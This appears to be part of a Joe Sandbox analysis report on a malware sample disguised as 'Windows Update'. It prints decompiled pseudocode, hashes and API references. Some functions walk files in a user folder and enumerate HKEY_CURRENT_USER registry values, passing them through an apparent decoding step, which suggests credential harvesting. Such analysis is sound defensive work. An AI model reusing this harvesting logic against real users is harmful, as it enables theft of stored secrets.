                                                                                                                    0x00103ab0
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00103ab4
                                                                                                                    0x00103ab7
                                                                                                                    0x00103abe
                                                                                                                    0x00103ac0
                                                                                                                    0x00103ac7
                                                                                                                    0x00103ac2
                                                                                                                    0x00103ac2
                                                                                                                    0x00103ac2
                                                                                                                    0x00103acc
                                                                                                                    0x00103acf
                                                                                                                    0x00103ad1
                                                                                                                    0x00103baa
                                                                                                                    0x00103baa
                                                                                                                    0x00000000
                                                                                                                    0x00103ad7
                                                                                                                    0x00103ad7
                                                                                                                    0x00103ada
                                                                                                                    0x00103ada
                                                                                                                    0x00103ae0
                                                                                                                    0x00103b18
                                                                                                                    0x00103b18
                                                                                                                    0x00103b1a
                                                                                                                    0x00103b82
                                                                                                                    0x00103b89
                                                                                                                    0x00103b8c
                                                                                                                    0x00103bb6
                                                                                                                    0x00103bbc
                                                                                                                    0x00000000
                                                                                                                    0x00103bbc
                                                                                                                    0x00103b8e
                                                                                                                    0x00103b91
                                                                                                                    0x00103b94
                                                                                                                    0x00103b95
                                                                                                                    0x00103b98
                                                                                                                    0x00103b9a
                                                                                                                    0x00103b9e
                                                                                                                    0x00103b9e
                                                                                                                    0x00103b9f
                                                                                                                    0x00103b9f
                                                                                                                    0x00000000
                                                                                                                    0x00103b9a
                                                                                                                    0x00103b1c
                                                                                                                    0x00103b1e
                                                                                                                    0x00103b32
                                                                                                                    0x00103b32
                                                                                                                    0x00103b34
                                                                                                                    0x00103b36
                                                                                                                    0x00103b45
                                                                                                                    0x00103b38
                                                                                                                    0x00103b3e
                                                                                                                    0x00103b40
                                                                                                                    0x00103b40
                                                                                                                    0x00103b48
                                                                                                                    0x00103b49
                                                                                                                    0x00103b53
                                                                                                                    0x00103b54
                                                                                                                    0x00103b59
                                                                                                                    0x00103b5c
                                                                                                                    0x00103b5f
                                                                                                                    0x00103bb2
                                                                                                                    0x00103bb2
                                                                                                                    0x00103bb2
                                                                                                                    0x00103bb2
                                                                                                                    0x00000000
                                                                                                                    0x00103b61
                                                                                                                    0x00103b61
                                                                                                                    0x00103b64
                                                                                                                    0x00103b66
                                                                                                                    0x00103b68
                                                                                                                    0x00103b6a
                                                                                                                    0x00103b6a
                                                                                                                    0x00103b6c
                                                                                                                    0x00103b6f
                                                                                                                    0x00103b71
                                                                                                                    0x00103b73
                                                                                                                    0x00000000
                                                                                                                    0x00103b75
                                                                                                                    0x00103b75
                                                                                                                    0x00103b75
                                                                                                                    0x00000000
                                                                                                                    0x00103b75
                                                                                                                    0x00103b73
                                                                                                                    0x00103b5f
                                                                                                                    0x00103b21
                                                                                                                    0x00103b27
                                                                                                                    0x00103b29
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00103b2f
                                                                                                                    0x00000000
                                                                                                                    0x00103b2f
                                                                                                                    0x00103ae2
                                                                                                                    0x00103ae5
                                                                                                                    0x00103ae8
                                                                                                                    0x00103aea
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00103aec
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00103af2
                                                                                                                    0x00103af4
                                                                                                                    0x00103af6
                                                                                                                    0x00103af8
                                                                                                                    0x00103af8
                                                                                                                    0x00103b01
                                                                                                                    0x00103b06
                                                                                                                    0x00103b09
                                                                                                                    0x00103b0c
                                                                                                                    0x00103b0e
                                                                                                                    0x00103b11
                                                                                                                    0x00103b13
                                                                                                                    0x00000000
                                                                                                                    0x00103ba2
                                                                                                                    0x00103ba2
                                                                                                                    0x00103ba2
                                                                                                                    0x00000000
                                                                                                                    0x00103ad7
                                                                                                                    0x00103ad1
                                                                                                                    0x00103a8a
                                                                                                                    0x00103a8f
                                                                                                                    0x00103a95
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • _memmove.LIBCMT ref: 00103B01
                                                                                                                    • __flush.LIBCMT ref: 00103B21
                                                                                                                      • Part of subcall function 00100A4A: __getptd_noexit.LIBCMT ref: 00100A4A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Offset: 00010000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.301191899.0000000000010000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_10000_Windows Update.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: __flush__getptd_noexit_memmove
                                                                                                                    • String ID: DKG$XKG
                                                                                                                    • API String ID: 3662107617-347010430
                                                                                                                    • Opcode ID: 390950b32339667cebde76435ab0dbf8f2b25c6679f7891ecd0013c2f6afea22
                                                                                                                    • Instruction ID: 1dccbeef78cc11fbb4fb734acefc292997751867afe215b65663984e098bd49e
                                                                                                                    • Opcode Fuzzy Hash: 390950b32339667cebde76435ab0dbf8f2b25c6679f7891ecd0013c2f6afea22
                                                                                                                    • Instruction Fuzzy Hash: A6417431700A06AFDB288F69C8945AE77A9EF44364B24852EE4E5DB2C0DBF4DF418B50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 000A0ACC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 133COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 26%
                                                                                                                    			E000A0ACC(void* __ebx, void* __edx, void* __edi, void* __esi) {
				signed int _v8;
				char _v12;
				char _v20;
				char _v540;
				long _v1060;
				char _v1580;
				char _v1856;
				signed char _v1900;
				void* __ebp;
				void* _t46;
				void* _t54;
				void* _t60;
				intOrPtr* _t81;
				void* _t82;
				void* _t84;
				void* _t85;
				void* _t86;
				signed int _t87;
				void* _t88;
				void* _t89;

				_t79 = __edx;
				_t72 = __ebx;
				_v8 =  *0x482960 ^ _t87;
				asm("movq xmm0, [0x47485c]");
				_v12 =  *0x474864;
				_push( &_v540);
				_push(0);
				_push(0);
				_push(0x1a);
				_push(0);
				asm("movq [ebp-0x10], xmm0");
				if( *0x47421c() >= 0) {
					E000FC766( &_v540, 0x208,  &_v20);
					E000FC711( &_v1580, 0x208,  &_v540);
					E000FC766( &_v1580, 0x208, 0x474868);
					_t89 = _t88 + 0x24;
					_t84 =  *0x474064( &_v1580,  &_v1900, __esi);
					if(_t84 != 0xffffffff) {
						_push(__edi);
						_t81 =  *0x474068;
						do {
							if((_v1900 & 0x00000010) == 0) {
								_t46 = E000FD31C( &_v1856, 0x2e);
								_t89 = _t89 + 8;
								if(_t46 != 0) {
									_t60 = E000FD159(_t46, 0x47487c, 4);
									_t89 = _t89 + 0xc;
									if(_t60 == 0) {
										swprintf( &_v1060, 0x208, 0x4746d0,  &_v540,  &_v1856);
										E0009F7EC(_t72, _t79, _t81, _t84,  &_v1060);
										_t89 = _t89 + 0x18;
									}
								}
							} else {
								if(_v1856 != 0x2e) {
									swprintf( &_v1060, 0x208, 0x47486c,  &_v540,  &_v1856,  &_v1856);
									_t54 = E0009E62C( &_v1060);
									_t89 = _t89 + 0x1c;
									if(_t54 != 0) {
										E0009F7EC(_t72, _t79, _t81, _t84,  &_v1060);
										_t89 = _t89 + 4;
									}
								}
							}
							_push( &_v1900);
							_push(_t84);
						} while ( *_t81() != 0);
						 *0x474048();
						_t82 = _t84;
						_pop(_t85);
						return L000FBE87(1, _t72, _v8 ^ _t87, _t79, _t82, _t85);
					} else {
						_pop(_t86);
						return L000FBE87(0, __ebx, _v8 ^ _t87, _t79, __edi, _t86);
					}
				} else {
					 *0x47412c();
					return L000FBE87(0, __ebx, _v8 ^ _t87, __edx, __edi, __esi);
				}
			}























                                                                                                                    0x000a0acc
                                                                                                                    0x000a0acc
                                                                                                                    0x000a0adc
                                                                                                                    0x000a0ae4
                                                                                                                    0x000a0aec
                                                                                                                    0x000a0af5
                                                                                                                    0x000a0af6
                                                                                                                    0x000a0af8
                                                                                                                    0x000a0afa
                                                                                                                    0x000a0afc
                                                                                                                    0x000a0afe
                                                                                                                    0x000a0b0b
                                                                                                                    0x000a0b34
                                                                                                                    0x000a0b4c
                                                                                                                    0x000a0b62
                                                                                                                    0x000a0b67
                                                                                                                    0x000a0b7e
                                                                                                                    0x000a0b83
                                                                                                                    0x000a0b96
                                                                                                                    0x000a0b97
                                                                                                                    0x000a0b9d
                                                                                                                    0x000a0ba4
                                                                                                                    0x000a0c05
                                                                                                                    0x000a0c0a
                                                                                                                    0x000a0c0f
                                                                                                                    0x000a0c19
                                                                                                                    0x000a0c1e
                                                                                                                    0x000a0c23
                                                                                                                    0x000a0c44
                                                                                                                    0x000a0c50
                                                                                                                    0x000a0c55
                                                                                                                    0x000a0c55
                                                                                                                    0x000a0c23
                                                                                                                    0x000a0ba6
                                                                                                                    0x000a0bad
                                                                                                                    0x000a0bd3
                                                                                                                    0x000a0bdf
                                                                                                                    0x000a0be4
                                                                                                                    0x000a0be9
                                                                                                                    0x000a0bf2
                                                                                                                    0x000a0bf7
                                                                                                                    0x000a0bf7
                                                                                                                    0x000a0be9
                                                                                                                    0x000a0bad
                                                                                                                    0x000a0c5e
                                                                                                                    0x000a0c5f
                                                                                                                    0x000a0c62
                                                                                                                    0x000a0c6b
                                                                                                                    0x000a0c74
                                                                                                                    0x000a0c7c
                                                                                                                    0x000a0c85
                                                                                                                    0x000a0b85
                                                                                                                    0x000a0b87
                                                                                                                    0x000a0b95
                                                                                                                    0x000a0b95
                                                                                                                    0x000a0b0d
                                                                                                                    0x000a0b0d
                                                                                                                    0x000a0b22
                                                                                                                    0x000a0b22

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Offset: 00010000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.301191899.0000000000010000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_10000_Windows Update.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: .
                                                                                                                    • API String ID: 0-248832578
                                                                                                                    • Opcode ID: c95beeaff2e6d92354486292d8eb93c40d73a090f830ce10bc0d3b9383457a9b
                                                                                                                    • Instruction ID: 9aab03ad766209f4ddce3f47fc90b045854eeab7d53216be23a148b333a57599
                                                                                                                    • Opcode Fuzzy Hash: c95beeaff2e6d92354486292d8eb93c40d73a090f830ce10bc0d3b9383457a9b
                                                                                                                    • Instruction Fuzzy Hash: 64419671D4021C6ADB90EBA0DD46FEE73EC9B59700F4005A6F609E2082EB74EB889F55
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00101235 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 125COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 82%
                                                                                                                    			E00101235(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				intOrPtr* _v532;
				char _v533;
				signed int _v540;
				intOrPtr _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				intOrPtr _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v584;
				signed int _v588;
				char _v592;
				signed int _v596;
				intOrPtr _v600;
				signed int _v604;
				void* _v616;
				char _v624;
				intOrPtr _v628;
				char _v636;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t66;
				signed int _t69;
				intOrPtr* _t72;
				signed int _t75;
				signed int _t77;
				signed int _t80;
				void* _t86;
				char _t91;
				signed int _t93;
				signed int _t94;
				signed int _t97;
				void* _t103;
				signed int _t105;
				intOrPtr* _t108;
				void* _t109;
				signed int _t111;

				_v8 =  *0x482960 ^ _t111;
				_t108 = _a8;
				_v564 = _a4;
				_v532 = _t108;
				_v544 = _a16;
				_v596 = 0;
				_v540 = 0;
				_v572 = 0;
				_v556 = 0;
				_v568 = 0;
				_v588 = 0;
				_v576 = 0;
				E000FC510( &_v636, _a12);
				_v600 = E00100A4A();
				_t66 = _v564;
				if(_t66 == 0) {
					L26:
					 *((intOrPtr*)(E00100A4A())) = 0x16;
					_t69 = E001009DB() | 0xffffffff;
				} else {
					if(( *(_t66 + 0xc) & 0x00000040) != 0) {
						L12:
						if(_t108 == 0) {
							goto L26;
						} else {
							_t91 =  *_t108;
							_t97 = 0;
							_v548 = 0;
							_v552 = 0;
							_v584 = 0;
							_v604 = 0;
							_v533 = _t91;
							_v592 = _t91;
							if(_t91 != 0) {
								_t72 = _v532;
								while(1) {
									_v532 = _t72 + 1;
									if(_t97 < 0) {
										goto L22;
									}
									_t41 = _t91 - 0x20; // 0x483620
									if(_t41 > 0x58) {
										_t75 = 0;
									} else {
										_t75 =  *(_t91 + 0x47d688) & 0x0000000f;
									}
									_t105 =  *((char*)(_v584 + 0x47d6a8 + _t75 * 8));
									_t77 = _t105 >> 4;
									_v584 = _t105;
									_v584 = _t77;
									if(_t77 <= 7) {
										goto ( *((intOrPtr*)(0x465021 + _t77 * 4)));
									}
									_t72 = _v532;
									_t91 =  *_t72;
									_v533 = _t91;
									_v592 = _t91;
									if(_t91 != 0) {
										continue;
									}
									goto L22;
								}
							}
							L22:
							_t69 = _t97;
						}
					} else {
						_t80 = E00102BC8(_t66);
						_t93 = _t80;
						if(_t93 == 0xffffffff || _t93 == 0xfffffffe) {
							_t97 = 0x483640;
						} else {
							_t97 = ((_t93 & 0x0000001f) << 6) +  *((intOrPtr*)(0x48b030 + (_t80 >> 5) * 4));
						}
						if(( *(_t97 + 0x24) & 0x0000007f) != 0) {
							goto L26;
						} else {
							if(_t93 == 0xffffffff || _t93 == 0xfffffffe) {
								_t94 = 0x483640;
							} else {
								_t94 = ((_t93 & 0x0000001f) << 6) +  *((intOrPtr*)(0x48b030 + (_t93 >> 5) * 4));
							}
							if(( *(_t94 + 0x24) & 0x00000080) != 0) {
								goto L26;
							} else {
								goto L12;
							}
						}
					}
				}
				_pop(_t103);
				_pop(_t109);
				_pop(_t86);
				if(_v624 != 0) {
					 *(_v628 + 0x70) =  *(_v628 + 0x70) & 0xfffffffd;
				}
				return L000FBE87(_t69, _t86, _v8 ^ _t111, _t97, _t103, _t109);
			}












































                                                                                                                    0x00101245
                                                                                                                    0x0010124d
                                                                                                                    0x00101257
                                                                                                                    0x00101267
                                                                                                                    0x0010126d
                                                                                                                    0x00101273
                                                                                                                    0x00101279
                                                                                                                    0x0010127f
                                                                                                                    0x00101285
                                                                                                                    0x0010128b
                                                                                                                    0x00101291
                                                                                                                    0x00101297
                                                                                                                    0x0010129d
                                                                                                                    0x001012a7
                                                                                                                    0x001012ad
                                                                                                                    0x001012b5
                                                                                                                    0x00101d86
                                                                                                                    0x00101d8b
                                                                                                                    0x00101d96
                                                                                                                    0x001012bb
                                                                                                                    0x001012bf
                                                                                                                    0x00101324
                                                                                                                    0x00101326
                                                                                                                    0x00000000
                                                                                                                    0x0010132c
                                                                                                                    0x0010132c
                                                                                                                    0x00101330
                                                                                                                    0x00101332
                                                                                                                    0x00101338
                                                                                                                    0x0010133e
                                                                                                                    0x00101344
                                                                                                                    0x0010134a
                                                                                                                    0x00101350
                                                                                                                    0x00101358
                                                                                                                    0x00101364
                                                                                                                    0x0010136a
                                                                                                                    0x0010136b
                                                                                                                    0x00101373
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00101379
                                                                                                                    0x0010137e
                                                                                                                    0x0010138f
                                                                                                                    0x00101380
                                                                                                                    0x0010138a
                                                                                                                    0x0010138a
                                                                                                                    0x00101397
                                                                                                                    0x001013a1
                                                                                                                    0x001013a4
                                                                                                                    0x001013b0
                                                                                                                    0x001013b9
                                                                                                                    0x001013bf
                                                                                                                    0x001013bf
                                                                                                                    0x00101d46
                                                                                                                    0x00101d4c
                                                                                                                    0x00101d4e
                                                                                                                    0x00101d54
                                                                                                                    0x00101d5c
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00101d5c
                                                                                                                    0x0010136a
                                                                                                                    0x00101d62
                                                                                                                    0x00101d62
                                                                                                                    0x00101d62
                                                                                                                    0x001012c1
                                                                                                                    0x001012c2
                                                                                                                    0x001012c8
                                                                                                                    0x001012cd
                                                                                                                    0x001012e8
                                                                                                                    0x001012d4
                                                                                                                    0x001012df
                                                                                                                    0x001012df
                                                                                                                    0x001012f1
                                                                                                                    0x00000000
                                                                                                                    0x001012f7
                                                                                                                    0x001012fa
                                                                                                                    0x00101315
                                                                                                                    0x00101301
                                                                                                                    0x0010130c
                                                                                                                    0x0010130c
                                                                                                                    0x0010131e
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0010131e
                                                                                                                    0x001012f1
                                                                                                                    0x001012bf
                                                                                                                    0x00101d6b
                                                                                                                    0x00101d6c
                                                                                                                    0x00101d6d
                                                                                                                    0x00101d6e
                                                                                                                    0x00101d76
                                                                                                                    0x00101d76
                                                                                                                    0x00101d85

                                                                                                                    APIs
                                                                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0010129D
                                                                                                                      • Part of subcall function 00100A4A: __getptd_noexit.LIBCMT ref: 00100A4A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Offset: 00010000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.301191899.0000000000010000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_10000_Windows Update.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Locale$UpdateUpdate::___getptd_noexit
                                                                                                                    • String ID: @6H$@6H$@XFG
                                                                                                                    • API String ID: 3393215657-1532833022
                                                                                                                    • Opcode ID: c46186abff3eba777254c28d3d0824cc50076727cb8c16f3a3e1561ec7b0e80c
                                                                                                                    • Instruction ID: c281547fd0198166dc17aeaadea882e9dbc9e45b1e823fd50bdd09ac9f6d8e53
                                                                                                                    • Opcode Fuzzy Hash: c46186abff3eba777254c28d3d0824cc50076727cb8c16f3a3e1561ec7b0e80c
                                                                                                                    • Instruction Fuzzy Hash: D35190719012689FCB64DF688C983ECBBF0AF59320F2446E9D49DEB291D7749E818F40
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 000A2B0C Relevance: 6.3, APIs: 4, Instructions: 270COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 20%
                                                                                                                    			E000A2B0C(void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				char _v136;
				char _v392;
				char _v520;
				signed int _v1032;
				char _v1532;
				char _v2532;
				char _v3556;
				char _v3560;
				char _v3564;
				char _v3568;
				intOrPtr _v3572;
				char _v3576;
				intOrPtr _v3580;
				char _v3588;
				void* __ebx;
				void* __ebp;
				intOrPtr _t65;
				signed int _t69;
				signed int _t74;
				signed int _t80;
				signed int _t85;
				signed int _t93;
				intOrPtr* _t101;
				signed int _t105;
				signed int _t107;
				signed int _t110;
				signed int _t122;
				signed int _t124;
				signed int _t128;
				signed int _t130;
				intOrPtr* _t133;
				signed int _t137;
				intOrPtr* _t143;
				void* _t144;
				intOrPtr _t146;
				void* _t147;
				void* _t148;
				signed int _t149;
				void* _t150;
				void* _t151;
				void* _t152;
				void* _t153;
				void* _t154;

				_t141 = __edx;
				_v8 =  *0x482960 ^ _t149;
				_t65 = _a4;
				_t133 =  *0x474018;
				_push( &_v3568);
				_push(0x20019);
				_push(0);
				_push(_t65);
				_push(0x80000001);
				_v3580 = _t65;
				if( *_t133() == 0) {
					_t143 =  *0x474000;
					_t146 = 0;
					_v3572 = 0;
					_v3560 = 0x80;
					_t69 =  *_t143(_v3568, 0,  &_v136,  &_v3560, 0, 0, 0, 0, __edi, __esi);
					__eflags = _t69;
					if(_t69 == 0) {
						while(1) {
							__eflags = _t69 - 0x103;
							if(_t69 == 0x103) {
								goto L29;
							}
							_t74 = E000FC802( &_v136, 0x4746c4);
							_t151 = _t150 + 8;
							__eflags = _t74;
							if(_t74 == 0) {
								L8:
								E0009E71C( &_v2532, 0x4746d0, _v3580);
								_t150 = _t151 + 0x10;
								_t80 =  *_t133(0x80000001,  &_v2532, 0, 0x20019,  &_v3564,  &_v136);
								__eflags = _t80;
								if(_t80 == 0) {
									_t148 = 0;
									_v3560 = 0x100;
									_t85 =  *_t143(_v3564, 0,  &_v392,  &_v3560, 0, 0, 0, 0);
									__eflags = _t85;
									if(_t85 == 0) {
										while(1) {
											__eflags = _t85 - 0x103;
											if(_t85 == 0x103) {
												goto L27;
											}
											E0009E73C( &_v3556, 0x4746d0,  &_v2532);
											_t150 = _t150 + 0x10;
											_t93 =  *_t133(0x80000001,  &_v3556, 0, 0x20019,  &_v3576,  &_v392);
											__eflags = _t93;
											if(_t93 == 0) {
												_v1032 = _t93;
												_v3560 = 0x200;
												 *0x474014(_v3576, 0x4746d8, 0,  &_v3588,  &_v1032,  &_v3560);
												 *0x474010(_v3576);
												_t101 =  &_v1032;
												_t141 = _t101 + 1;
												do {
													_t137 =  *_t101;
													_t101 = _t101 + 1;
													__eflags = _t137;
												} while (_t137 != 0);
												__eflags = _t101 != _t141;
												if(_t101 != _t141) {
													_push(0x80);
													_t105 = L0009DD7C( &_v1032,  &_v520);
													_t150 = _t150 + 0xc;
													__eflags = _t105;
													if(_t105 != 0) {
														_t107 = L000FBD5C( &_v392, 0x40);
														_t152 = _t150 + 8;
														__eflags = _t107;
														if(_t107 == 0) {
															_t122 = E000FC802( &_v136, 0x4746c8);
															_t154 = _t152 + 8;
															__eflags = _t122;
															if(_t122 != 0) {
																_t124 = E000FC802( &_v136, 0x4746cc);
																_t152 = _t154 + 8;
																__eflags = _t124;
																if(_t124 == 0) {
																	_push(0x4746e8);
																	goto L22;
																}
															} else {
																_push(0x4746dc);
																L22:
																_push(0x100);
																_push( &_v392);
																E000FC766();
																_t152 = _t152 + 0xc;
															}
														}
														E000FC711( &_v1532, 0x1f4, 0x474ae8);
														_t110 =  *0x483d84;
														_t153 = _t152 + 0xc;
														__eflags = _t110;
														if(__eflags != 0) {
															_push( &_v1532);
															_push(0x474b44);
															_push(_t110);
															E000FDBDE(_t133, _t143, _t148, __eflags);
															_push( &_v392);
															_push(0x474b58);
															_push( *0x483d84);
															E000FDBDE(_t133, _t143, _t148, __eflags);
															E000FDCF0( *0x483d84, 0x474b68,  &_v520);
															_push( *0x483d84);
															_push(0x474b78);
															E000FDD09(_t133, _t143, _t148, __eflags);
															_t150 = _t153 + 0x2c;
														} else {
															_push( &_v520);
															_push( &_v392);
															_push( &_v1532);
															_push(0x474b2c);
															L000FDF32(_t143, _t148, __eflags);
															_t150 = _t153 + 0x10;
														}
													}
												}
											}
											_t148 = _t148 + 1;
											_v3560 = 0x100;
											_t85 =  *_t143(_v3564, _t148,  &_v392,  &_v3560, 0, 0, 0, 0);
											__eflags = _t85;
											if(_t85 == 0) {
												continue;
											}
											goto L27;
										}
									}
									L27:
									 *0x474010(_v3564);
									_t146 = _v3572;
								}
							} else {
								_t128 = E000FC802( &_v136, 0x4746c8);
								_t151 = _t151 + 8;
								__eflags = _t128;
								if(_t128 == 0) {
									goto L8;
								} else {
									_t130 = E000FC802( &_v136, 0x4746cc);
									_t150 = _t151 + 8;
									__eflags = _t130;
									if(_t130 == 0) {
										goto L8;
									}
								}
							}
							_t146 = _t146 + 1;
							_v3572 = _t146;
							_v3560 = 0x80;
							_t69 =  *_t143(_v3568, _t146,  &_v136,  &_v3560, 0, 0, 0, 0);
							__eflags = _t69;
							if(_t69 == 0) {
								continue;
							}
							goto L29;
						}
					}
					L29:
					 *0x474010(_v3568);
					_pop(_t144);
					_pop(_t147);
					__eflags = _v8 ^ _t149;
					return L000FBE87(1, _t133, _v8 ^ _t149, _t141, _t144, _t147);
				} else {
					return L000FBE87(0, _t133, _v8 ^ _t149, __edx, __edi, __esi);
				}
			}















































                                                                                                                    0x000a2b0c
                                                                                                                    0x000a2b1c
                                                                                                                    0x000a2b1f
                                                                                                                    0x000a2b23
                                                                                                                    0x000a2b2f
                                                                                                                    0x000a2b30
                                                                                                                    0x000a2b35
                                                                                                                    0x000a2b37
                                                                                                                    0x000a2b38
                                                                                                                    0x000a2b3d
                                                                                                                    0x000a2b47
                                                                                                                    0x000a2b5c
                                                                                                                    0x000a2b62
                                                                                                                    0x000a2b7d
                                                                                                                    0x000a2b83
                                                                                                                    0x000a2b8d
                                                                                                                    0x000a2b8f
                                                                                                                    0x000a2b91
                                                                                                                    0x000a2b9c
                                                                                                                    0x000a2b9c
                                                                                                                    0x000a2ba1
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x000a2bb3
                                                                                                                    0x000a2bb8
                                                                                                                    0x000a2bbb
                                                                                                                    0x000a2bbd
                                                                                                                    0x000a2bf3
                                                                                                                    0x000a2c0c
                                                                                                                    0x000a2c11
                                                                                                                    0x000a2c2e
                                                                                                                    0x000a2c30
                                                                                                                    0x000a2c32
                                                                                                                    0x000a2c38
                                                                                                                    0x000a2c53
                                                                                                                    0x000a2c5d
                                                                                                                    0x000a2c5f
                                                                                                                    0x000a2c61
                                                                                                                    0x000a2c6c
                                                                                                                    0x000a2c6c
                                                                                                                    0x000a2c71
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x000a2c91
                                                                                                                    0x000a2c96
                                                                                                                    0x000a2cb3
                                                                                                                    0x000a2cb5
                                                                                                                    0x000a2cb7
                                                                                                                    0x000a2cbd
                                                                                                                    0x000a2ce5
                                                                                                                    0x000a2cef
                                                                                                                    0x000a2cfb
                                                                                                                    0x000a2d01
                                                                                                                    0x000a2d07
                                                                                                                    0x000a2d0c
                                                                                                                    0x000a2d0c
                                                                                                                    0x000a2d0e
                                                                                                                    0x000a2d0f
                                                                                                                    0x000a2d0f
                                                                                                                    0x000a2d13
                                                                                                                    0x000a2d15
                                                                                                                    0x000a2d1b
                                                                                                                    0x000a2d2e
                                                                                                                    0x000a2d33
                                                                                                                    0x000a2d36
                                                                                                                    0x000a2d38
                                                                                                                    0x000a2d47
                                                                                                                    0x000a2d4c
                                                                                                                    0x000a2d4f
                                                                                                                    0x000a2d51
                                                                                                                    0x000a2d5f
                                                                                                                    0x000a2d64
                                                                                                                    0x000a2d67
                                                                                                                    0x000a2d69
                                                                                                                    0x000a2d7e
                                                                                                                    0x000a2d83
                                                                                                                    0x000a2d86
                                                                                                                    0x000a2d88
                                                                                                                    0x000a2d8a
                                                                                                                    0x00000000
                                                                                                                    0x000a2d8a
                                                                                                                    0x000a2d6b
                                                                                                                    0x000a2d6b
                                                                                                                    0x000a2d8f
                                                                                                                    0x000a2d95
                                                                                                                    0x000a2d9a
                                                                                                                    0x000a2d9b
                                                                                                                    0x000a2da0
                                                                                                                    0x000a2da0
                                                                                                                    0x000a2d69
                                                                                                                    0x000a2db4
                                                                                                                    0x000a2db9
                                                                                                                    0x000a2dbe
                                                                                                                    0x000a2dc1
                                                                                                                    0x000a2dc3
                                                                                                                    0x000a2def
                                                                                                                    0x000a2df0
                                                                                                                    0x000a2df5
                                                                                                                    0x000a2df6
                                                                                                                    0x000a2e01
                                                                                                                    0x000a2e02
                                                                                                                    0x000a2e07
                                                                                                                    0x000a2e0d
                                                                                                                    0x000a2e24
                                                                                                                    0x000a2e29
                                                                                                                    0x000a2e2f
                                                                                                                    0x000a2e34
                                                                                                                    0x000a2e39
                                                                                                                    0x000a2dc5
                                                                                                                    0x000a2dcb
                                                                                                                    0x000a2dd2
                                                                                                                    0x000a2dd9
                                                                                                                    0x000a2dda
                                                                                                                    0x000a2ddf
                                                                                                                    0x000a2de4
                                                                                                                    0x000a2de4
                                                                                                                    0x000a2dc3
                                                                                                                    0x000a2d38
                                                                                                                    0x000a2d15
                                                                                                                    0x000a2e52
                                                                                                                    0x000a2e5a
                                                                                                                    0x000a2e64
                                                                                                                    0x000a2e66
                                                                                                                    0x000a2e68
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x000a2e68
                                                                                                                    0x000a2c6c
                                                                                                                    0x000a2e6e
                                                                                                                    0x000a2e74
                                                                                                                    0x000a2e7a
                                                                                                                    0x000a2e7a
                                                                                                                    0x000a2bbf
                                                                                                                    0x000a2bcb
                                                                                                                    0x000a2bd0
                                                                                                                    0x000a2bd3
                                                                                                                    0x000a2bd5
                                                                                                                    0x00000000
                                                                                                                    0x000a2bd7
                                                                                                                    0x000a2be3
                                                                                                                    0x000a2be8
                                                                                                                    0x000a2beb
                                                                                                                    0x000a2bed
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x000a2bed
                                                                                                                    0x000a2bd5
                                                                                                                    0x000a2e96
                                                                                                                    0x000a2e9e
                                                                                                                    0x000a2ea4
                                                                                                                    0x000a2eae
                                                                                                                    0x000a2eb0
                                                                                                                    0x000a2eb2
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x000a2eb2
                                                                                                                    0x000a2b9c
                                                                                                                    0x000a2eb8
                                                                                                                    0x000a2ebe
                                                                                                                    0x000a2ec7
                                                                                                                    0x000a2ec8
                                                                                                                    0x000a2ec9
                                                                                                                    0x000a2ed9
                                                                                                                    0x000a2b49
                                                                                                                    0x000a2b59
                                                                                                                    0x000a2b59

